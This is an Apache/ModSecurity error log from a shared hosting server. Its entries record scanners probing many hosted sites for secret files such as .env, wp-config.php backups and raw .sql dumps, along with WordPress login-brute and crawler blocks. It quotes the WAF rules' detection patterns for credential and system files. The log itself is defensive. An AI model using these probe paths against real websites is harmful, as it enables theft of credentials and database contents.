[Tue May 26 14:50:08.596539 2026] [security2:error] [pid 648203:tid 648333] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1zwAAAIU"]
[Tue May 26 14:50:08.770440 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:32264] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/web/.env"] [unique_id "ahVlyLEQDDtxJNiDrdT13wAAAL8"]
[Tue May 26 14:50:08.822326 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.95:32246] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT13gAAAPc"]
[Tue May 26 14:50:08.878312 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:32258] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT14AAAAKU"]
[Tue May 26 14:50:08.991274 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT14wAAAO4"]
[Tue May 26 14:50:09.000985 2026] [security2:error] [pid 648203:tid 648346] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT10gAAAJI"]
[Tue May 26 14:50:09.215025 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlybEQDDtxJNiDrdT15gAAANk"]
[Tue May 26 14:50:09.435747 2026] [security2:error] [pid 648203:tid 648429] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlybEQDDtxJNiDrdT1-AAAAOU"]
[Tue May 26 14:50:09.577746 2026] [security2:error] [pid 648203:tid 648418] [client 45.3.52.145:12703] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1zgAAANo"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:09.905375 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:47834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlybEQDDtxJNiDrdT1_gAAAK4"]
[Tue May 26 14:50:09.976323 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:32134] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlybEQDDtxJNiDrdT2AgAAAOk"]
[Tue May 26 14:50:10.617699 2026] [security2:error] [pid 648203:tid 648379] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlyrEQDDtxJNiDrdT2DgAAALM"]
[Tue May 26 14:50:10.815404 2026] [security2:error] [pid 648203:tid 648351] [client 45.148.10.95:32056] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.bak"] [unique_id "ahVlyrEQDDtxJNiDrdT2HwAAAJc"]
[Tue May 26 14:50:10.817345 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:32118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php"] [unique_id "ahVlyrEQDDtxJNiDrdT2IQAAAO4"]
[Tue May 26 14:50:10.872585 2026] [security2:error] [pid 648203:tid 648435] [client 45.148.10.95:32110] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.new"] [unique_id "ahVlyrEQDDtxJNiDrdT2IgAAAOs"]
[Tue May 26 14:50:10.877497 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyrEQDDtxJNiDrdT2IAAAAPA"]
[Tue May 26 14:50:10.942686 2026] [security2:error] [pid 648203:tid 648409] [client 45.148.10.95:32148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVlyrEQDDtxJNiDrdT2JgAAANE"]
[Tue May 26 14:50:10.978633 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:32184] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyrEQDDtxJNiDrdT2JQAAAPU"]
[Tue May 26 14:50:11.405974 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVly7EQDDtxJNiDrdT2MQAAAMg"]
[Tue May 26 14:50:11.499732 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:47834] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVly7EQDDtxJNiDrdT2MgAAAL4"]
[Tue May 26 14:50:11.559351 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:47848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/website/.env"] [unique_id "ahVly7EQDDtxJNiDrdT2NAAAAJ0"]
[Tue May 26 14:50:11.635774 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVly7EQDDtxJNiDrdT2NgAAAK0"]
[Tue May 26 14:50:11.775280 2026] [security2:error] [pid 648203:tid 648366] [client 209.50.180.130:44729] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlyrEQDDtxJNiDrdT2FgAAAKY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:11.802741 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:32264] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.old"] [unique_id "ahVly7EQDDtxJNiDrdT2PQAAAJ4"]
[Tue May 26 14:50:11.897674 2026] [security2:error] [pid 648203:tid 648375] [client 45.148.10.95:32258] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVly7EQDDtxJNiDrdT2RwAAAK8"]
[Tue May 26 14:50:11.931457 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:32246] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVly7EQDDtxJNiDrdT2SAAAALc"]
[Tue May 26 14:50:11.964366 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVly7EQDDtxJNiDrdT2SwAAALA"]
[Tue May 26 14:50:12.752009 2026] [security2:error] [pid 648203:tid 648223] [remote 209.42.18.223:38106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVlzLEQDDtxJNiDrdT2XAAAyRM"]
[Tue May 26 14:50:12.809682 2026] [security2:error] [pid 648203:tid 648367] [client 74.249.173.207:2575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahVlzLEQDDtxJNiDrdT2YAAAAKc"]
[Tue May 26 14:50:12.973806 2026] [security2:error] [pid 648203:tid 648455] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlzLEQDDtxJNiDrdT2WwAAAP8"]
[Tue May 26 14:50:13.977838 2026] [security2:error] [pid 648203:tid 648449] [client 209.50.170.56:64711] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlzLEQDDtxJNiDrdT2YQAAAPk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:14.365284 2026] [security2:error] [pid 648203:tid 648378] [client 195.178.110.34:60574] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/website/.env"] [unique_id "ahVlzrEQDDtxJNiDrdT2iQAAALI"]
[Tue May 26 14:50:15.105591 2026] [security2:error] [pid 648203:tid 648439] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlzrEQDDtxJNiDrdT2mwAAAO8"]
[Tue May 26 14:50:15.168019 2026] [security2:error] [pid 648203:tid 648401] [client 65.111.0.69:64901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.0.111.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlz7EQDDtxJNiDrdT2qQAAAMk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:15.669819 2026] [security2:error] [pid 648203:tid 648234] [remote 45.250.255.226:44628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVlz7EQDDtxJNiDrdT2tgAAhh4"]
[Tue May 26 14:50:16.611299 2026] [security2:error] [pid 648203:tid 648340] [client 74.249.173.207:2585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-admin/user/index.php"] [unique_id "ahVl0LEQDDtxJNiDrdT2ywAAAIw"]
[Tue May 26 14:50:17.042117 2026] [security2:error] [pid 648203:tid 648430] [client 114.119.139.1:20571] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVl0bEQDDtxJNiDrdT21gAAAOY"], referer: http://glorodavionics.com/index.php?route=product/product&path=72_79_130&product_id=179
[Tue May 26 14:50:18.108557 2026] [security2:error] [pid 648203:tid 648351] [client 196.244.71.212:57781] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVl0bEQDDtxJNiDrdT24gAAAJc"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 14:50:18.349755 2026] [security2:error] [pid 648203:tid 648431] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl0bEQDDtxJNiDrdT28QAAAOc"]
[Tue May 26 14:50:19.704985 2026] [security2:error] [pid 648203:tid 648402] [client 172.225.181.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVl07EQDDtxJNiDrdT3HAAAAMo"]
[Tue May 26 14:50:20.010962 2026] [security2:error] [pid 648203:tid 648387] [client 195.178.110.34:60588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/website/.env"] [unique_id "ahVl1LEQDDtxJNiDrdT3MAAAALs"]
[Tue May 26 14:50:20.173746 2026] [security2:error] [pid 648203:tid 648450] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl07EQDDtxJNiDrdT3KQAAAPo"]
[Tue May 26 14:50:20.424387 2026] [core:error] [pid 648203:tid 648381] [client 198.235.24.32:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:50:20.424404 2026] [core:error] [pid 648203:tid 648381] [client 198.235.24.32:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:50:20.574979 2026] [security2:error] [pid 648203:tid 648339] [client 185.191.171.14:18270] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/8/"] [unique_id "ahVl1LEQDDtxJNiDrdT3QAAAAIs"]
[Tue May 26 14:50:20.575087 2026] [security2:error] [pid 648203:tid 648339] [client 185.191.171.14:18270] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/8/"] [unique_id "ahVl1LEQDDtxJNiDrdT3QAAAAIs"]
[Tue May 26 14:50:21.330595 2026] [security2:error] [pid 648203:tid 648389] [client 114.119.134.95:48249] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/prespontaneousffcd/addffd1898036.shtml"] [unique_id "ahVl1bEQDDtxJNiDrdT3WAAAAL0"], referer: http://ghanemgh.com/prespontaneousffcd/addffd1898036.shtml
[Tue May 26 14:50:21.437487 2026] [security2:error] [pid 648203:tid 648419] [client 114.119.129.237:63717] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.athelstan.org.in"] [uri "/images/BharatVEpur.jpg"] [unique_id "ahVl1bEQDDtxJNiDrdT3XAAAANs"], referer: https://www.athelstan.org.in/images/BharatVEpur.jpg
[Tue May 26 14:50:22.449843 2026] [security2:error] [pid 648203:tid 648406] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl1rEQDDtxJNiDrdT3cAAAAM4"]
[Tue May 26 14:50:23.441578 2026] [autoindex:error] [pid 648203:tid 648451] [client 198.235.24.176:62636] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:50:24.872895 2026] [security2:error] [pid 648203:tid 648406] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl2LEQDDtxJNiDrdT3tQAAAM4"]
[Tue May 26 14:50:26.759849 2026] [security2:error] [pid 648203:tid 648442] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl2rEQDDtxJNiDrdT39AAAAPI"]
[Tue May 26 14:50:27.381014 2026] [security2:error] [pid 648203:tid 648373] [client 113.170.104.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl2rEQDDtxJNiDrdT4AwAAAK0"]
[Tue May 26 14:50:27.891037 2026] [security2:error] [pid 648203:tid 648447] [client 195.178.110.34:51272] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/development/.env"] [unique_id "ahVl27EQDDtxJNiDrdT4GwAAAPc"]
[Tue May 26 14:50:28.480371 2026] [security2:error] [pid 648203:tid 648436] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl3LEQDDtxJNiDrdT4IwAAAOw"]
[Tue May 26 14:50:28.935855 2026] [security2:error] [pid 648203:tid 648273] [remote 142.93.171.165:57466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.171.93.142.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVl3LEQDDtxJNiDrdT4MQAA3kU"]
[Tue May 26 14:50:31.579535 2026] [security2:error] [pid 648203:tid 648377] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl37EQDDtxJNiDrdT4dQAAALE"]
[Tue May 26 14:50:33.220273 2026] [security2:error] [pid 648203:tid 648383] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVl4LEQDDtxJNiDrdT4oAAAALc"]
[Tue May 26 14:50:35.375620 2026] [security2:error] [pid 648203:tid 648274] [remote 103.11.102.106:37740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVl47EQDDtxJNiDrdT4ywABA0Y"]
